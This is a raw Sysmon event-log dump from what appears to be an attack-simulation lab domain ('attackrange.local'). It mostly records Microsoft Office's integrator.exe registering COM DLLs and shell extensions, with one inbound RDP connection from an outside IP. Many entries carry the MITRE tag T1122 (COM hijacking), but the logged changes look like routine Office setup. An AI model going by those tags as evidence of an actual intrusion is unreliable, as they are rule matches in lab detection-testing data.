Shared\Office16\OFFREL.DLL 13241300x800000000000000071797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.641{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{D66DC78C-4F61-447F-942B-3FB6980118CF}{D66DC78C-4F61-447F-942B-3FB6980118CF} 13241300x800000000000000071796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.641{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{506F4668-F13E-4AA1-BB04-B43203AB3CC0}{506F4668-F13E-4AA1-BB04-B43203AB3CC0} 13241300x800000000000000071795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.641{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{D66DC78C-4F61-447F-942B-3FB6980118CF}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\VISSHE.DLL 13241300x800000000000000071794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.626{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{A394DCA9-3727-11D4-BD85-00C04F6B93A4}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\VISSHE.DLL 13241300x800000000000000071793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.626{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{506F4668-F13E-4AA1-BB04-B43203AB3CC0}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\VISSHE.DLL 13241300x800000000000000071792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.626{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{6939BF8D-FF94-492C-9E4E-BD6439D8F867}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\VVIEWDWG.DLL 13241300x800000000000000071791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.610{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{550D0110-8DCD-11D1-8524-00A02495E426}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\VVIEWDWG.DLL 13241300x800000000000000071790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.610{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{000D0E00-0000-0000-C000-000000001157}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\VVIEWDWG.DLL 13241300x800000000000000071789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.610{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{6939BF8D-FF94-492C-9E4E-BD6439D8F867}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\VVIEWDWG.DLL 13241300x800000000000000071788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.594{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{550D0110-8DCD-11D1-8524-00A02495E426}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\VVIEWDWG.DLL 13241300x800000000000000071787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.594{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{000D0E00-0000-0000-C000-000000001157}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\VVIEWDWG.DLL 13241300x800000000000000071786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.594{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\ddeexec\Application\(Default)IExplore 13241300x800000000000000071785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.594{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\ddeexec\(Default)"file:%%1",,-1,,,,, 13241300x800000000000000071784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.594{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\ddeexec\Topic\(Default)WWW_OpenURL 13241300x800000000000000071783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:55:55.594{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\command\(Default)"%%ProgramFiles%%\Internet Explorer\iexplore.exe" -nohome 13241300x800000000000000071782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.579{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{F8CF7A98-2C45-4c8d-9151-2D716989DDAB}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000071781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.579{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\ddeexec\Application\(Default)IExplore 13241300x800000000000000071780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.579{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKLM\SOFTWARE\Classes\VisioViewer.Viewer\shell\open\ddeexec\ApplicationDWORD (0x00000000) 13241300x800000000000000071779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.579{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\ddeexec\(Default)"file:%%1",,-1,,,,, 13241300x800000000000000071778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.579{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\ddeexec\Topic\(Default)WWW_OpenURL 13241300x800000000000000071777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.579{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKLM\SOFTWARE\Classes\VisioViewer.Viewer\shell\open\ddeexec\TopicDWORD (0x00000000) 13241300x800000000000000071776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:55:55.579{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\VisioViewer.Viewer\shell\open\command\(Default)"%%ProgramFiles%%\Internet Explorer\iexplore.exe" -nohome 13241300x800000000000000071775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.563{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{F8CF7A98-2C45-4c8d-9151-2D716989DDAB}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000071774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.548{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{355822FC-86F1-4BE8-B5F0-A33736789641}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000071773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.532{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{AFE9E2F0-5BBA-4169-A33B-EE3727AC3482}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000071772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.532{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{35C5242B-7455-4F9C-962B-369EA43ED6F3}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000071771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.532{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{72B66649-3DBF-429F-BD6F-7774A9784B78}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000071770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.532{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{C41662BB-1FA0-4CE0-8DC5-9B7F8279FF97}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000071769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.532{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000071768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.532{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{5383EF74-273B-4278-AB0C-CDAA9FD5369E}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000071767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.532{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{01BE4CFB-129A-452B-A209-F9D40B3B84A5}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000071766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.532{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{33154C99-BF49-443D-A73C-303A23ABBE97}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000071765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.532{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{E3956DCF-D1C7-4375-AAAA-22FF8191C479}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000071764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.516{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{355822FC-86F1-4BE8-B5F0-A33736789641}Microsoft Word Thumbnail Handler 13241300x800000000000000071763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.516{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{AFE9E2F0-5BBA-4169-A33B-EE3727AC3482}Microsoft Visio Thumbnail Handler 13241300x800000000000000071762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.516{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{35C5242B-7455-4F9C-962B-369EA43ED6F3}Microsoft PowerPoint Thumbnail Handler 13241300x800000000000000071761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.516{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{72B66649-3DBF-429F-BD6F-7774A9784B78}Microsoft Excel Thumbnail Handler 13241300x800000000000000071760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.516{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{C41662BB-1FA0-4CE0-8DC5-9B7F8279FF97}Microsoft Access Thumbnail Handler 13241300x800000000000000071759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.501{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155}Microsoft Word Metadata Handler 13241300x800000000000000071758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.501{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{5383EF74-273B-4278-AB0C-CDAA9FD5369E}Microsoft Visio Metadata Handler 13241300x800000000000000071757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.501{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{01BE4CFB-129A-452B-A209-F9D40B3B84A5}Microsoft PowerPoint Metadata Handler 13241300x800000000000000071756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.501{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{33154C99-BF49-443D-A73C-303A23ABBE97}Microsoft Excel Metadata Handler 13241300x800000000000000071755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.501{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{E3956DCF-D1C7-4375-AAAA-22FF8191C479}Microsoft Access Metadata Handler 13241300x800000000000000071754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.485{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{AB968F1E-E20B-403A-9EB8-72EB0EB6797E}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoxev.dll 13241300x800000000000000071753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.469{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{EFBD9A69-66AF-4D44-BB36-D477E5014216}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\OSFROAMINGPROXY.DLL 13241300x800000000000000071752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.469{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{5C615ED6-4F9F-48BE-8D84-17409196DE36}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\OSFPROXY.DLL 13241300x800000000000000071751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.469{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKMU\SOFTWARE\Classes\PROTOCOLS\Handler\mso-minsb-roaming.16DWORD (0x00000000) 13241300x800000000000000071750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.469{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{83C25742-A9F7-49FB-9138-434302C88D07}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL 13241300x800000000000000071749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.469{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKMU\SOFTWARE\Classes\PROTOCOLS\Handler\mso-minsb.16DWORD (0x00000000) 13241300x800000000000000071748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.469{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{42089D2D-912D-4018-9087-2B87803E93FB}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL 13241300x800000000000000071747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.469{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKMU\SOFTWARE\Classes\PROTOCOLS\Handler\osf-roaming.16DWORD (0x00000000) 13241300x800000000000000071746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.469{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{42089D2D-912D-4018-9087-2B87803E93FB}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL 13241300x800000000000000071745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.469{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKMU\SOFTWARE\Classes\PROTOCOLS\Handler\osf.16DWORD (0x00000000) 13241300x800000000000000071744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.469{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{5504BE45-A83B-4808-900A-3A5C36E7F77A}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL 13241300x800000000000000071743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.454{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{68CED213-317D-3F27-9036-A33240DA522E}\InprocServer32\(Default)mscoree.dll 13241300x800000000000000071742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.454{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{1227B818-7298-3D68-AC55-DDDA56EE56E1}\InprocServer32\(Default)mscoree.dll 13241300x800000000000000071741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.454{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{07B06095-5687-4D13-9E32-12B4259C9813}\InprocServer32\(Default)mscoree.dll 13241300x800000000000000071740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.438{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{CDEC13B2-0B3C-400E-B909-E27EE89C6799}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000071739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.438{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{E18FEC31-2EA1-49A2-A7A6-902DC0D1FF05}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000071738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.423{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{9800F18F-3D86-4744-A7D0-540989C86D7B}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000071737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.423{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{3B0BD075-929C-4E52-AAD1-458C81A10B24}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000071736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.423{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{9ED13477-E909-45BC-BADC-2106D04D6BD7}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000071735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{BDEADEF5-C265-11D0-BCED-00A0C90AB50F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000071734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.407{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{BDEADE9E-C265-11D0-BCED-00A0C90AB50F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\Interceptor.dll 13241300x800000000000000071733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.391{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{3FD37ABB-F90A-4DE5-AA38-179629E64C2F}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000071732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.391{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{62B4D041-4667-40B6-BB50-4BC0A5043A73}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 13241300x800000000000000071731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.376{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{9203C2CB-1DC1-482D-967E-597AFF270F0D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\Interceptor.dll 354300x800000000000000071730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:53.527{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-2830-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 13241300x800000000000000071729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.282{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{D0B22D03-D05D-4C6D-8AB7-9392E84A87B9}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000071728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.282{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{D5EC4D34-77DA-4F7A-B8C4-8A910C1C1CFE}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 13241300x800000000000000071727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.282{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{805B7F91-C9CF-4EDF-ACA6-775664FDFB3E}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\ACEDAO.DLL 